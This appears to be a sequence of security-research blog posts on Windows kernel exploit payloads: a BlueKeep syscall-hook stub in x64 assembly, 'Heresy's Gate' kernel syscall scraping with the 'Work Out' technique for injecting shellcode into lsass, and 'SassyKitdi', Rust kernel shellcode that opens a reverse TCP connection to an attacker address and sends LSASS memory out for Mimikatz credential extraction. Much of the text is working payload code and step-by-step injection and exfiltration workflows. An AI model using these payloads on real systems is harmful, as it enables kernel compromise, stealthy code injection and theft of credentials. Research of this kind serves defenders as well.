        push rdx
        push r8
        push r9
        push r10
        push r11
    
        mov rbp, STAGE_SHARED_MEM
    
    ; use lock cmpxchg for queueing APC only one at a time
    single_thread_gate:
        xor eax, eax
        mov dl, 1
        lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl
        jnz _restore_syscall
    
    ; only 1 thread has this lock
    ; allow interrupts while executing ring0 to ring3
        sti
        call r0_to_r3
        cli
    
    ; all threads can clean up
    _restore_syscall:
    
    ; calculate offset to 0x2b using shared storage
        mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]
        mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]
        add rdi, rax
    
    ; atomic change small jmp to push 2b
        mov word [rdi], 0x2b6a
    

    All threads restore the push 2b, as the code flow results in less bytes, no extra locking, and shouldn't matter.

    Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.

    _syscall_hook_done:
    
    ; restore register values
        pop r11
        pop r10
        pop r9
        pop r8
        pop rdx
        pop rcx
        pop rbp
        pop rax
    
    ; rdi still holds push2b offset!
    ; but needs to be restored
    
    ; do not cause bugcheck 0xc4 arg1=0x91
        mov qword [rsp-0x20], rdi
        pop rdi
    
    ; return to &KiSystemCall64Shadow+push2b
        jmp [rsp-0x28]
    

    You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.

    Conclusion 

    Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours so I'm guessing KPP isn't fast enough just like with the IA32_LSTAR method.

    It's simple, it's obvious, it's hacky; but it works and so it's what you want.

    "Heresy's Gate": Kernel Zw*/NTDLL Scraping + "Work Out": Ring 0 to Ring 3 via Worker Factories

    14 June 2020 at 23:19

    Introduction 

    What's in a name? Naming things is the first step in being able to talk about them.

    What's a lower realm than Hell? Heresy is the 6th Circle of Hell in Dante's Inferno.

    With Hell's Gate scraping syscalls in user-mode, you can think about Heresy's Gate as the generic methodology to dynamically generate and execute kernel-mode syscall stubs that are not exported by ntoskrnl.exe. Much like Hell's Gate, the general idea has been discussed previously (in this case since at least NT 4), however older techniques (Nebbett's Gate) no longer work and this post may introduce new methods.

    A proud people who believe in political throwback, that's not all I'm here to present you.

    Unlocking Heresy's Gate, among other things, gives access to a plethora of novel Ring 0 (kernel) to Ring 3 (user) transitions, as is required by exploit payloads in EternalBlue (DoublePulsar), BlueKeep, and SMBGhost. Just to name a few.

    I will describe such a method, Work Out, using the undocumented Worker Factory feature that is the kernel backbone of the user-mode Thread Pool API added in Windows Vista.

    tl;dr: PoC || GTFO GitHub

    All of this information was casually shared with a member of MSRC and forwarded to the Windows Defender team prior to publication. These are not vulnerabilities; Heresy's Gate is rootkit tradecraft to execute private syscalls, and Work Out is a new kernel mode exploit payload.

    I have no knowledge of if/how/when mitigations/ETW/etc. may be added to NT.

    Heresy's Gate 

    Many fun routines are not readily exported by the Executive binary (ntoskrnl.exe). They simply do not exist in import/export directories for any module. And with their ntoskrnl.exe file/RVA offsets changing between each compile, they can be difficult to find in a generic way. Not exactly ASLR, but similar.

    However, if a syscall exists, NTDLL.DLL/USER32.DLL/WIN32U.DLL are gonna have stubs for them.

    • Heaven's Gate: Execute 64-bit syscalls in WoW64 (32-bit code)
    • Hell's Gate: Execute syscalls in user-mode direcly by scraping ntdll op codes
    • Heresy's Gate: Execute unexported syscalls in kernel-mode (described here by scraping ntdll and &ZwReadFile)

    I'll lump Heaven's gate into this, even though it is only semi-related. Alex Ionescu has written about how CFG killed the original technique.

    I guess if you went further up the chain than WoW64, or perhaps something fancy in managed code land or a Universal Windows Platform app, you'd have a Higher Gate? And since Heresy is only the sixth circle, there's still room to go lower... HAL's Gate?

    Closing Nebbett's Gate 

    People have been heuristically scanning function signatures and even disassembling in the kernel for ages to find unexported routines. I wondered what the earliest reference would be for executing an unexported routine.

    Gary Nebbett describes in pages 433-434 of "Windows NT/2000 Native API Reference" about finding unexported syscalls in ntdll and executing their user-mode stubs directly in kernel mode!

    Interesting indeed. I thought: there's no way this code could still work!

    Open questions:

    1. There must be issues with how the syscall stub has changed over the years?
    2. Can modern "syscall" instruction (not int 0x2e) even execute in kernel mode?
    3. There's probably issues with modern kernels implementing SMEP (though you could just Capcom it and piss off PatchGuard in your payload).
    4. Will this screw up PreviousMode and we need user buffers and such?
    5. Aren't these ntdll functions often hooked by user-mode antivirus code?
    6. What about the logic of Meltdown KVA Shadow?

    Meltdown KVA Shadow Page Fault Loop 

    And indeed, it seems that the Meltdown KVA Shadow strikes again to spoil our exploit payload fun.

    I attempted this method on Windows 10 x64 and to my surprise I did not immediately crash! However, my call to sc.exe appeared to hang forever.

    Let's peek at what the thread is doing:

    Oof, it appears to be in some type of a page fault loop. Indeed setting a breakpoint on KiPageFaultShadow will cause it to hit over and over.

    Maybe this and all the other potential issues could be worked around?

    Instead of fighting with Meltdown patch and all the other outstanding issues, I decided to scrape opcodes out of NTDLL and copy an exported Zw function stub out of the Executive.

    NTDLL Opcode Scraping 

    To scrape an opcode number out of NTDLL, we must find its Base Address in kernel mode. There are at least 3 ways to accomplish this.

    1. You can map it out of a processes PEB->Ldr using PsGetProcessPeb() while under KeStackAttachProcess().
    2. You can call ZwQuerySystemInformation() with the SystemModuleInformation class.
    3. You can look it up in the KnownDlls section object.

    KnownDlls Section Object 

    I thought the last one is the most interesting and perhaps less known for antivirus detection methods, so we'll go with that. However, I think if I was writing a shellcode I'd go with the first one.

    NTSTATUS NTAPI GetNtdllBaseAddressFromKnownDlls(
        _In_ ZW_QUERY_SECTION __ZwQuerySection,
        _Out_ PVOID *OutAddress
    )
    {
        static UNICODE_STRING KnownDllsNtdllName = 
            RTL_CONSTANT_STRING(L"\\KnownDlls\\ntdll.dll");
    
        NTSTATUS Status = STATUS_SUCCESS;
    
        OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
        InitializeObjectAttributes(
            &ObjectAttributes, 
            &KnownDllsNtdllName, 
            OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, 
            0, 
            NULL
        );
    
        HANDLE SectionHandle = NULL;
    
        Status = ZwOpenSection(&SectionHandle, SECTION_QUERY, &ObjectAttributes);
    
        if (NT_SUCCESS(Status))
        {
            // +0x1000 because kernel only checks min size
            UCHAR SectionInfo[0x1000]; 
    
            Status = __ZwQuerySection(
                SectionHandle,
                SectionImageInformation,
                &SectionInfo, 
                sizeof(SectionInfo), 
                0
            );
    
            if (NT_SUCCESS(Status))
            {
                *OutAddress = 
                    ((SECTION_IMAGE_INFORMATION*)&SectionInfo)
                        ->TransferAddress;
            }
    
            ZwClose(SectionHandle);
        }
    
        return Status;
    }
    

    This requires the following struct definition:

    typedef struct _SECTION_IMAGE_INFORMATION {
        PVOID TransferAddress;
        // ...
    } SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;
    

    Once you have the NTDLL base address, it is a well-known process to read the PE export directory to find functions by name/ordinal.

    Extracting Syscall Opcode 

    Let's inspect an NTDLL syscall.

    Note: Syscalls have changed a lot over the years.

    However, the MOV EAX, #OPCODE part is probably pretty stable. And since syscalls are used as a table index; they are never a larger value than 0xFFFF. So the higher order bits will be 0x0000.

    You can scan for the opcode using the following mask:

    CHAR WildCardByte = '\xff';
    
    //  b8 ?? ?? 00 00  mov eax, 0x0000????
    UCHAR NtdllScanMask[] = "\xb8\xff\xff\x00\x00"; 
    

    Dynamically Cloning a Zw Call 

    So we have the opcode from the user-mob stub, now we need to create the kernel-mode stub to call it. We can accomplish this by cloning an existing stub.

    ZwReadFile() is pretty generic, so let's go with that.

    The MOV EAX instruction right before the final JMP is the syscall opcode. We'll have to overwrite it with our desired opcode.

    Fixing nt!KiService* Relative 32 Addresses 

    So, the LEA and JMP instruction use relative 32-bit addressing. That means it is a hardcoded offset within +/-2GB of the end of the instruction.

    Converting the relative 32 address to its 64-bit full address is pretty simple code:

    static inline
    PVOID NTAPI
    ConvertRelative32AddressToAbsoluteAddress(
        _In_reads_(4) PUINT32 Relative32StartAddress
    )
    {
        UINT32 Offset = *Relative32StartAddress;
        PUCHAR InstructionEndAddress = 
            (PUCHAR)Relative32StartAddress + 4;
    
        return InstructionEndAddress + Offset;
    }
    

    Since our little stub will not be within +/- 2GB space, we'll have to replace the LEA with a MOVABS, and the JMP (rel32) with a JMP [$+0].

    I checked that this mask is stable to at least Windows 7, and probably way earlier.

    UCHAR KiServiceLinkageScanMask[] =
    "\x50"                          // 50   push    rax
    "\x9c"                          // 9c   pushfq
    "\x6a\x10"                      // 6a 10  push    10h
    "\x48\x8d\x05\x00\x00\x00\x00"; // 48 8d 05 ?? ?? ?? ?? 
                                    // lea rax, [nt!KiServiceLinkage]
    
    UCHAR KiServiceInternalScanMask[] =
    "\x50"                  // 50             push rax
    "\xb8\x00\x00\x00\x00"  // b8 ?? ?? ?? ?? mov  eax, ??
    "\xe9\x00\x00\x00\x00"; // e9 ?? ?? ?? ?? jmp  nt!KiServiceInternal
    

    Create a Heretic Call Stub 

    So now that we've scanned all the offsets we can perform a copy. Allocate the stub, keeping in mind our new stub will be larger because of the MOVABS and JMP [$+0] we are adding. You'll have to do a couple of memcpy's using the mask scan offsets where we are going to replace the LEA and JMP rel-32 instructions. This clone step is only mildly annoying, but easy to mess up.

    Next perform the following fixups:

    1. Overwrite the syscall opcode
    2. Change the LEA relative-32 to a MOVABS instruction
    3. Change the JMP relative-32 to a JMP [$+0]
    4. Place the nt!KiServiceInternal pointer at $+0

    Now just cast it to a function pointer and call it!

    Work Out 

    The Windows 10 Executive does now export some interesting functions like RtlCreateUserThread, no Heresy needed!, so an ultramodern payload likely has it easy. This was not the case when I checked the Windows 7 Executive (did not check 8).

    Heresy's Gate techniques gets you access to ZwCreateThread(Ex). You could also build out a ThreadContinue primitive using ZwSetContextThread. Also, PsSetContextThread is readily exported.

    Well Known Ring 0 Escapes 

    I will describe a new method about how to escape with Worker Factories, however first let's gloss over existing methodologies being used.

    Queuing a User Mode APC 

    Right now, all the hot exploits, malwares, and antiviruses seem to always be queuing user-mode Asynchronous Procedure Calls (APCs).

    As far as I can tell, it's because _sleepya copypasta'd me (IMPORTANT: no disrespect whatsoever, everyone in this copypasta chain made MASSIVE improvements to eachother) and I copypasta'd the Equation Group who copypasta'd Barnaby Jack, and people just use the available method because it's off-the-shelf code.

    I originally got the idea from Luke Jenning's writeup on DoublePulsar's process injection, and through further analysis optimized a few things including the overall shellcode size to 14.41% the original size.

    APCs are a very complicated topic and I don't want to get too in the weeds. At a high level, they are how I/O callbacks can return data back to usermode, asynchronously without blocking. You can think of it like the heart of the Windows epoll/kqueue methods. Essentially, they help form a proactor (vs. reactor) pattern that fixed NT creator David Cutler's issues with Unix.

    He expressed his low opinion of the Unix process input/output model by reciting "Get a byte, get a byte, get a byte byte byte" to the tune of the finale of Rossini's William Tell Overture.[citation needed]

    It's worth noting Linux (and basically all modern operating systems) now have proactor pattern I/O facilities.

    At any rate, the psuedo-code workflow is as follows:

    target_thread = ...
    
    KeInitializeApc(
        &apc,
        target_thread,
        mode = both, 
        kernel_func = &kapc, 
        user_func = NOT_NULL
    );
    
    KeInsertQueueApc(&apc);  
    
    --- ring 0 apc ---
    
    kapc:
    mov cr8, PASSIVE_LEVEL
    
    *NormalRoutine = ZwAllocateVirtualMemory(RWX)
    _memcpy(*NormalRoutine, user_start)
    
    mov cr8, APC_LEVEL
    
    --- ring 3 apc ---
    
    user_start:
    CreateThread(&calc_shellcode)
    
    calc_shellcode:
    
    1. Find an Alertable + Waiting State thread.
    2. Create an APC on the thread.
    3. Queue the APC.
    4. In kernel routine, drop IRQL and allocate payload for the user-mode NormalRoutine.
    5. In user mode, spawn a new thread from the one we hijacked.

    There's even more plumbing going on under the hood and it's actually a pretty complicated process. Do note that at least all required functions are readily exported. You can also do it without a kernel-mode APC, so you don't have to manually adjust the IRQL (however the methodology introduces its own complexities).

    Also note that the target thread not only needs to be Alertable, it needs to be in a Waiting State, which is fairly hard to check in a cross-version way. You can DKOM traverse EPROCESS.ThreadListHead backwards as non-Alertable threads are always the first ones. If the thread is not in a Waiting State, the call to KeInsertQueueApc will return an NT error. The injected process will also crash if TEB.ActivationContextStackPointer is NULL.

    A more verbose version of the technique I believe was first described in 2005 by Barnaby Jack in the paper Remote Windows Kernel Exploitation: Step Into the Ring 0. The technique may have been known before 2005, however this is not documented functionality so would be rare for a normal driver writer to have stumbled on it. Matt Suiche attempted to document the history of the APC technique and has a similar finding as Barnaby Jack being the original discoverer.

    Driver code that implements the APC technique to inject a DLL into a process from the kernel is provided by Petr Beneš. There's also a writeup with some C code in the Vault7 leak.

    The method is also available in x64 assembly in places such as the Metasploit BlueKeep exploit; sleepya_ and I have (noncollaboratively) built upon eachother's work over the past few years to improve the payload. Indeed this shellcode is the basis for the SMBGhost exploits released by both ZecOps and chompy1337.

    This abuse of APC queuing has been such a thorn in Microsoft's side that they added ETW tracing for antivirus to it, on more recent versions the tail end of NtQueueApcThreadEx() calls EtwTiLogQueueApcThread(). There have been some documented bypasses. There's also been issues in SMBGhost where CFG didn't like the user mode APC start address, which hugeh0ge found a workaround for.

    SharedUserData SystemCall Hook (+ Others) 

    APCs are one of several methods described by bugcheck and skape in Uninformed's Windows Kernel-Mode Payload Fundamentals. Another is called SharedUserData SystemCall Hook.

    The only exploit prior to EternalBlue in Metasploit that required this type of kernel mode payload was MS09-050, in x86 shellcode only.

    Stephen Fewer had a writeup of how the MS09-050 Metasploit shellcode performed this system call hook.

    1. Hook syscall MSR.
    2. Wait for desired process to make a syscall.
    3. Allocate the payload.
    4. Overwrite the user-mode return address for the syscall at the desired payload.

    There's a bit of glue required to fix up the hijacked thread.

    Worker Factory Internals 

    Why Worker Factories? They're ETW detecting us with APCs, dog; it's time to evolve.

    I was originally investigating Worker Factories as a potential user mode process migration technique that avoided the CreateRemoteThread() and QueueUserApc() primitives (and many similar well-known methods).

    I discovered you cannot create a Worker Factory in another process. However, in Windows 10 all processes that load ntdll receive a thread pool, and thus implicitly have a Worker Factory! To speed up loading DLLs or something.

    I was able to succeed in messing with the properties of this default Worker Factory, but I did not readily see a way to update the start routine for threads in the pool. I also some some pointers in NTDLL thread pool functions which perhaps could be adjusted to get the process migration to pop. More research is needed.

    I instead decided to try it as a Ring 0 escape, and here we are.

    NTDLL Thread Pool Implementation 

    Worker Factories are handles that ntdll communicates with when you use the Thread Pool APIs. These essentially just let you have user-mode work queues that you can post tasks to. Most of the logic is inside ntdll, with the function prefixes Tp and Tpp. This is good, because it means the environment can be adjusted without a context switch, and generally adding additional complexity to kernels should be avoided when possible.

    It is very easy to create a worker factory, and a process can have many of them. The Windows Internals books has a few pages on them (here is from older 5th edition).

    The entire kernel mode API is implemented with the following syscalls:

    1. ZwCreateWorkerFactory()
    2. ZwQueryInformationWorkerFactory()
    3. ZwSetInformationWorkerFactory()
    4. ZwWaitForWorkViaWorkerFactory()
    5. ZwWorkerFactoryWorkerReady()
    6. ZwReleaseWorkerFactoryWorker()
    7. ZwShutdownWorkerFactory()

    As ntdll does all the heavy lifting, nothing in the kernel interacts with these functions. As such they are not exported, and require Heresy's Gate.

    ntdll creates a worker factory, adjusts its parameters such as minimum threads, and uses the other syscalls to inform the kernel that tasks are ready to be run. Worker threads will eat the user-mode work queues to exhaustion before returning to the kernel to wait to be explicitly released again.

    The main takeaway so far is: the kernel creates and manages the threads. ntdll manages the work items in the queue.

    Creating a Worker Factory 

    The create syscall has the following prototype:

    NTSTATUS NTAPI
    ZwCreateWorkerFactory(
        _Out_ PHANDLE WorkerFactoryHandleReturn,
        _In_ ACCESS_MASK DesiredAccess,
        _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
        _In_ HANDLE CompletionPortHandle,
        _In_ HANDLE WorkerProcessHandle,
        _In_ PVOID StartRoutine,
        _In_opt_ PVOID StartParameter,
        _In_opt_ ULONG MaxThreadCount,
        _In_opt_ SIZE_T StackReserve,
        _In_opt_ SIZE_T StackCommit
    );
    

    The most interesting parameter for us is the StartRoutine/StartParameter. This will be our Ring 3 code we wish to execute, and anything we want to pass it directly.

    The WorkerProcessHandle parameter accepts the generic "current process" handle of -1, so there is no need to create a proper handle for the process if you are already in the same process context. In kernel mode, this means using KeStackAttachProcess(). As I mentioned earlier, you cannot create a Worker Factory for another process.

    The reverse engineered psuedocode is:

    ObpReferenceObjectByHandleWithTag(
        WorkerProcessHandle, 
        ...,
        PsProcessType, 
        &Process
    );
    
    if (KeGetCurrentThread()->ApcState.Process != Process)
    {
        return STATUS_INVALID_PARAMETER;
    }
    

    The create function also requires an I/O completion port. This can be gained using ZwCreateIoCompletion(), which is a readily exported function by the Executive.

    You also must specify some access rights for the WorkerFactoryHandle:

    #define WORKER_FACTORY_RELEASE_WORKER 0x0001
    #define WORKER_FACTORY_WAIT 0x0002
    #define WORKER_FACTORY_SET_INFORMATION 0x0004
    #define WORKER_FACTORY_QUERY_INFORMATION 0x0008
    #define WORKER_FACTORY_READY_WORKER 0x0010
    #define WORKER_FACTORY_SHUTDOWN 0x0020
    
    #define WORKER_FACTORY_ALL_ACCESS ( \
        STANDARD_RIGHTS_REQUIRED | \
        WORKER_FACTORY_RELEASE_WORKER | \
        WORKER_FACTORY_WAIT | \
        WORKER_FACTORY_SET_INFORMATION | \
        WORKER_FACTORY_QUERY_INFORMATION | \
        WORKER_FACTORY_READY_WORKER | \
        WORKER_FACTORY_SHUTDOWN \
        )
    

    greetz to Process Hacker for the reversing of these definitions. However, these evaluate to 0xF003F, and the modern Windows 10 ntdll creates with the mask: 0xF00FF. We only really need WORKER_FACTORY_SET_INFORMATION, but passing a totally full mask shouldn't be an issue (even on older versions).

    Adjusting Worker Factory Minimum Threads 

    By default, it appears just creating a Worker Factory does not immediately gain you any new threads in the target process.

    However, you can tune the minimum amount of threads with the following function:

    NTSTATUS WINAPI
    NtSetInformationWorkerFactory(
        _In_ HANDLE WorkerFactoryHandle,
        _In_ ULONG WorkerFactoryInformationClass,
        _In_ PVOID WorkerFactoryInformation,
        _In_ ULONG WorkerFactoryInformationLength
    );
    The enumeration of options:
    typedef enum _WORKERFACTORYINFOCLASS
    {
        WorkerFactoryTimeout, // q; s: LARGE_INTEGER
        WorkerFactoryRetryTimeout, // q; s: LARGE_INTEGER
        WorkerFactoryIdleTimeout, // q; s: LARGE_INTEGER
        WorkerFactoryBindingCount,
        WorkerFactoryThreadMinimum, // q; s: ULONG
        WorkerFactoryThreadMaximum, // q; s: ULONG
        WorkerFactoryPaused, // ULONG or BOOLEAN
        WorkerFactoryBasicInformation, // WORKER_FACTORY_BASIC_INFORMATION
        WorkerFactoryAdjustThreadGoal,
        WorkerFactoryCallbackType,
        WorkerFactoryStackInformation, // 10
        WorkerFactoryThreadBasePriority,
        WorkerFactoryTimeoutWaiters, // since THRESHOLD
        WorkerFactoryFlags,
        WorkerFactoryThreadSoftMaximum,
        WorkerFactoryThreadCpuSets, // since REDSTONE5
        MaxWorkerFactoryInfoClass
    } WORKERFACTORYINFOCLASS, *PWORKERFACTORYINFOCLASS;
    

    Shout out again to Process Hacker for providing us with these definitions.

    Step Into the Ring 3 

    The psuedo-code workflow for Work Out is as follows:

    PsLookupProcessByProcessId(pid, &lsass)
    
        KeStackAttachProcess(lsass)
    
            start_addr = ZwAllocateVirtualMemory(RWX)
            _memcpy(start_addr, shellcode)
    
            ZwCreateIoCompletion(&hio)
    
            __ZwCreateWorkerFactory(&hWork, hio, start_addr)
    
            __ZwSetInformationWorkerFactory(hWork, min_threads = 1)
      
        KeUnstackDetachProcess(lsass)
    
    ObDereferenceObject(lsass)
    
    1. Attach to the process.
    2. Allocate the user mode payload.
    3. Create an I/O completion handle.
    4. Create a worker factory with the the start routine being the payload.
    5. Adjust minimum threads to 1.

    Reference inect.c GitHub in the PoC code.

    Conclusion 

    I have left other ideas in this post for Ring 0 Escapes that may be worth PROOFing out as an open problem to the reader.

    If you think of other techniques for Heresy's Gate or Ring 0 Escapes, or just want to troll me, be sure to leave a comment!

    SassyKitdi: Kernel Mode TCP Sockets + LSASS Dump

    15 August 2020 at 22:58

    Introduction

    This post describes a kernel mode payload for Windows NT called "SassyKitdi" (LSASS + Rootkit + TDI). This payload is of a nature that can be deployed via remote kernel exploits such as EternalBlue, BlueKeep, and SMBGhost, as well as from local kernel exploits, i.e. bad drivers. This exploit payload is universal from (at least) Windows 2000 to Windows 10, and without having to carry around weird DKOM offsets.

    The payload has 0 interaction with user-mode, and creates a reverse TCP socket using the Transport Driver Interface (TDI), a precursor to the more modern Winsock Kernel (WSK). The LSASS.exe process memory and modules are then sent over the wire where they can be transformed into a minidump file on the attacker's end and passed into a tool such as Mimikatz to extract credentials.

    tl;dr: PoC || GTFO GitHub

    The position-independent shellcode is ~3300 bytes and written entirely in the Rust programming language, using many of its high level abstractions. I will outline some of the benefits of Rust for all future shellcoding needs, and precautions that need to be taken.

    Figure 0: An oversimplification of the SassyKitdi methodology.

    I don't have every AV on hand to test against obviously, but given that most AV misses obvious user-mode stuff thrown at it, I can only assume there is currently almost universal ineffectiveness of antivirus available being able to detect the methodology.

    Finally, I will discuss what a future kernel mode rootkits could look like, if one took this example a couple steps further. What's old is new again.

    Transport Driver Interface

    TDI is an old school method to talk to all types of network transports. In this case it will be used to create a reverse TCP connection back to the attacker. Other payloads such as Bind Sockets, as well as UDP, would follow a similar methodology.

    The use of TDI in rootkits is not exactly widespread, but it has been documented in the following books which served as references for this code:

    • Vieler, R. (2007). Professional Rootkits. Indianapolis, IN: Wiley Technology Pub.
    • Hoglund, G., & Butler, J. (2009). Rootkits: Subverting the Windows Kernel. Upper Saddle River, NJ: Addison-Wesley.

    Opening the TCP Device Object

    TDI device objects are found by their device name, in our case \Device\Tcp. Essentially, you use the ZwCreateFile() kernel API with the device name, and pass options in through the use of our old friend File Extended Attributes.

    pub type ZwCreateFile = extern "stdcall" fn(
        FileHandle:         PHANDLE,
        AccessMask:         ACCESS_MASK,
        ObjectAttributes:   POBJECT_ATTRIBUTES,
        IoStatusBlock:      PIO_STATUS_BLOCK,
        AllocationSize:     PLARGE_INTEGER,
        FileAttributes:     ULONG,
        ShareAccess:        ULONG,
        CreateDisposition:  ULONG,
        CreateOptions:      ULONG,
        EaBuffer:           PVOID,
        EaLength:           ULONG,
    ) -> NTSTATUS;
    

    The device name is passed in the ObjectAttributes field, and the configuration is passed in the EaBuffer. We must create a Transport handle (FEA: TransportAddress) and a Connection handle (FEA: ConnectionContext).

    The TransportAddress FEA takes a TRANSPORT_ADDRESS structure, which for IPv4 consists of a few other structures. It is at this point that we can choose which interface to bind to, or which port to use. In our case, we will choose 0.0.0.0 with port 0, and the kernel will bind us to the main interface with a random ephemeral port.

    #[repr(C, packed)]
    pub struct TDI_ADDRESS_IP {
        pub sin_port:   USHORT,
        pub in_addr:    ULONG,
        pub sin_zero:   [UCHAR; 8],
    }
    
    #[repr(C, packed)]
    pub struct TA_ADDRESS {
        pub AddressLength:  USHORT,
        pub AddressType:    USHORT,
        pub Address:        TDI_ADDRESS_IP,
    }
    
    #[repr(C, packed)]
    pub struct TRANSPORT_ADDRESS {
        pub TAAddressCount:     LONG,
        pub Address:            [TA_ADDRESS; 1],
    }
    

    The ConnectionContext FEA allows setting of an arbitrary context instead of a defined struct. In the example code we just set this to NULL and move on.

    At this point we have created the Transport Handle, Transport File Object, Connection Handle, and Connection File Object.

    Connecting to an Endpoint

    After initial setup, the rest of TDI API is performed through IOCTLs to the device object associated with our File Objects.

    TDI uses IRP_MJ_INTERNAL_DEVICE_CONTROL with various minor codes. The ones we are interested in are:

    #[repr(u8)]
    pub enum TDI_INTERNAL_IOCTL_MINOR_CODES {
        TDI_ASSOCIATE_ADDRESS     = 0x1,
        TDI_CONNECT               = 0x3,
        TDI_SEND                  = 0x7,
        TDI_SET_EVENT_HANDLER     = 0xb,
    }
    

    Each of these internal IOCTLs has various structures associated with them. The basic methodology is to:

    1. Get the Device Object from the File Object using IoGetRelatedDeviceObject()
    2. Create the internal IOCTL IRP using IoBuildDeviceIoControlRequest()
    3. Set the opcode inside IO_STACK_LOCATION.MinorFunction
    4. Copy the op's struct pointer to the IO_STACK_LOCATION.Parameters
    5. Dispatch the IRP with IofCallDriver()
    6. Wait for the operation to complete using KeWaitForSingleObject() (optional)

    For the TDI_CONNECT operation, the IRP parameters includes a TRANSPORT_ADDRESS structure (defined in the previous section). This time, instead of setting it to 0.0.0.0 port 0, we set it to the values of where we want to connect (and, in big endian).

    Sending Data Over the Wire

    If the connection IRP succeeds in establishing a TCP connection, we can then send TDI_SEND IRPs to the TCP device.

    The TDI driver expects a Memory Descriptor List (MDL) that describes the buffer to send over the network.

    Assuming we want to send some arbitrary data over the wire, we must perform the following steps:

    1. ExAllocatePool() a buffer and RtlCopyMemory() the data over (optional)
    2. IoAllocateMdl() providing the buffer address and size
    3. MmProbeAndLockPages() to page-in during the send operation
    4. Dispatch the Send IRP
    5. The I/O manager will unlock the pages and free the MDL
    6. ExFreePool() the buffer (optional)

    In this case the MDL is attached to the IRP. The Parameters structure we can just set SendFlags to 0 and SendLength to the data size.

    #[repr(C, packed)]
    pub struct TDI_REQUEST_KERNEL_SEND {
        pub SendLength:    ULONG,
        pub SendFlags:     ULONG,
    }
    

    Dumping LSASS from Kernel Mode

    LSASS is of course the goldmine on Windows, where prizes such as cleartext credentials and kerberos information can be obtained. Many AV vendors are getting better at hardening LSASS when attempting to dump from user-mode. But we'll do it from the privilege of the kernel.

    Mimikatz requires 3 streams to process a minidump: System Information, Memory Ranges, and Module List.

    Obtaining Operating System Information

    Mimikatz really only needs to know the Major, Minor, and Build versions of NT. This can be obtained with the NTOSKRNL exported function RtlGetVersion() that provides the following struct:

    #[repr(C)]
    pub struct RTL_OSVERSIONINFOW {
        pub dwOSVersionInfoSize:        ULONG,
        pub dwMajorVersion:             ULONG,
        pub dwMinorVersion:             ULONG,
        pub dwBuildNumber:              ULONG,
        pub dwPlatformId:               ULONG,
        pub szCSDVersion:               [UINT16; 128],    
    }
    

    Scraping All Memory Regions

    Of course, the most important part of an LSASS dump is the actual memory of the LSASS process. Using KeStackAttachProcess() allows one to read the virtual memory of LSASS. From there it is possible to iterate over memory ranges with ZwQueryVirtualMemory().

    pub type ZwQueryVirtualMemory = extern "stdcall" fn(
        ProcessHandle:              HANDLE,
        BaseAddress:                PVOID,
        MemoryInformationClass:     MEMORY_INFORMATION_CLASS,
        MemoryInformation:          PVOID,
        MemoryInformationLength:    SIZE_T,
        ReturnLength:               PSIZE_T,
    ) -> crate::types::NTSTATUS;
    

    Pass in -1 for the ProcessHandle, 0 for the initial BaseAddress, and use the MemoryBasicInformation class to receive the following struct:

    #[repr(C)]
    pub struct MEMORY_BASIC_INFORMATION {
        pub BaseAddress:            PVOID,
        pub AllocationBase:         PVOID,
        pub AllocationProtect:      ULONG,
        pub PartitionId:            USHORT,
        pub RegionSize:             SIZE_T,
        pub State:                  ULONG,
        pub Protect:                ULONG,
        pub Type:                   ULONG,
    }
    

    For the next iteration of ZwQueryVirtualMemory(), just set the next BaseAddress to BaseAddress+RegionSize. Keep iterating until ReturnLength is 0 or there is an NT error.

    Collecting List of Loaded Modules

    Mimikatz also requires to know where a few of the DLLs are located in memory in order to scrape some secrets out of them during processing.

    The most convenient way to iterate these is to grab the DLL list out of the PEB. The PEB can be found using ZwQueryInformationProcess() with the ProcessBasicInformation class.

    Mimikatz requires the DLL name, address, and size. These are easily scraped out of PEB->Ldr.InLoadOrderLinks, which is a well-documented methodology to obtain the linked list of LDR_DATA_TABLE_ENTRY entries.

    #[cfg(target_arch="x86_64")]
    #[repr(C, packed)]
    pub struct LDR_DATA_TABLE_ENTRY {
        pub InLoadOrderLinks:               LIST_ENTRY,
        pub InMemoryOrderLinks:             LIST_ENTRY,
        pub InInitializationOrderLinks:     LIST_ENTRY,
        pub DllBase:                        PVOID,
        pub EntryPoint:                     PVOID,
        pub SizeOfImage:                    ULONG,
        pub Padding_0x44_0x48:              [BYTE; 4],
        pub FullDllName:                    UNICODE_STRING,
        pub BaseDllName:                    UNICODE_STRING,
        /* ...etc... */
    }
    

    Just iterate the linked list til you wind back at the beginning, grabbing FullDllName, DllBase, and SizeOfImage of each DLL for the dump file.

    Notes on Shellcoding in Rust

    Rust is one of the more modern languages trending these days. It does not require a run-time and can be used to write extremely low-level embedded code that interacts with C FFI. To my knowledge there are only a few things that C/C++ can do that Rust cannot: C variadic functions (coming soon) and SEH (outside of internal panic operations?).

    It is simple enough to cross-compile Rust from Linux using the mingw-w64 linker, and use Rustup to add the x86_64-windows-pc-gnu target. I create a DLL project and extract the code between _DllMainCRTStartup() and malloc(). Not very stable perhaps, but I could only figure out how to generate PE files and not something such as a COM file.

    Here's an example of how nice shellcoding in Rust can be:

    let mut socket = nttdi::TdiSocket::new(tdi_ctx);
    
    socket.add_recv_handler(recv_handler);
    socket.connect(0xdd01a8c0, 0xBCFB)?;  // 192.168.1.221:64444
    
    socket.send("abc".as_bytes().as_ptr(), 3)?;
    

    Compiler Optimizations

    Rust sits atop LLVM, an intermediate language before final code generation, and thus benefits from many of the optimizations that languages such as C++ (Clang) have received over the years.

    I won't get too deep into the weeds, especially with zealots on all sides, but the highly static compilation nature of Rust often results in much smaller code size than C or C++. Code size is not necessarily an indicator of performance, but for shellcode it is important. You can do your own testing, but Rust's code generation is extremely good.

    We can set the Cargo.toml file to use opt-level='z' (optimize for size) lto=true (link time optimize) to further reduce generated code size.

    Using High-Level Constructs

